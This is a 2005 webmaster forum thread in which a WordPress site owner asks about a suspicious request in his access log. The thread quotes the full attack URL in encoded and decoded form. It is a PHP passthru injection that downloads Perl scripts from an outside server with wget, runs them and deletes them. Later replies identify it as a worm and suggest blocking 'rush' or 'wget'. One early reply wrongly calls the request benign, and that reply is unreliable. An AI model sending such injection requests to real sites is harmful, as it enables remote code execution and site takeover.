Forum Moderators: phranque

Message Too Old, No Replies

What is this? Possible hack attempt?

Something strange I noticed in my access log

         

mike3k

3:58 am on Feb 7, 2005 (gmt 0)

10+ Year Member



Checking my site stats, I found several requests like the following which seem to be some kind of scripting attack. I'm running WordPress.

<Snipped example URL - please decribe>

[edited by: trillianjedi at 9:21 am (utc) on Feb. 7, 2005]
[edit reason] TOS #13 [/edit]

keyplyr

4:34 am on Feb 7, 2005 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



You should exemplify your domain per TOS [webmasterworld.com]:

http://example.com
or
http://mydomain.com

mike3k

9:06 pm on Feb 7, 2005 (gmt 0)

10+ Year Member



Sorry - I just copied and pasted it UNEDITED from my Analog report. Here it is again - can anyone identify it?

/blog/index.php?cat=4&rush=echo%20_START_%3B%20cd%20/tmp;wget%20server2.norcomp.no/~private/a.txt;wget%20server2.norcomp.no/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20echo%20_END_&highlight=%2527.passthru%28$HTTP_GET_VARS%5Brush%5D%29.%2527%27;

keyplyr

9:52 pm on Feb 7, 2005 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month




I'm no PHP whiz, but it appears that someone is serving up your webpage from info in their directory. This is not necessarily a negative move. Many sites use something like this (example: about.com) to let users see a particular site without letting that user leave their own site.

Try a reverse DNS [dnsstuff.com] to see who is at work here. If it bothers you, ban their IPs from accessing your files.

lammert

12:23 am on Feb 8, 2005 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I am quite sure this IS an attack. If you decode the %% values by the ASCII values the represent, you get a shell script. They pull two perl scripts from a server, then execute these scripts in perl.

echo _START_;
cd /tmp;
wget sss.#*$!.tld/~private/a.txt;
wget sss.xxx.tld/~private/w.txt;
perl a.txt;
rm a.txt;
perl w.txt;
rm w.txt;
echo _END_&highlight=%'.passthru($HTTP_GET_VARS[rush]).%'';

lammert

1:00 am on Feb 8, 2005 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I did some further investigation.

According to sources outside WW this seems to be a variant of a worm circulating to attack phpBB and other php based websites. Some sources suggest you block all requests with "rush" in the string in the .htaccess file, but other sources claim that this is just one variant and it can easily mutate to another unrecognizable form, so blocking everything with "rush" doesn't work.

keyplyr

2:33 am on Feb 8, 2005 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I block "wget"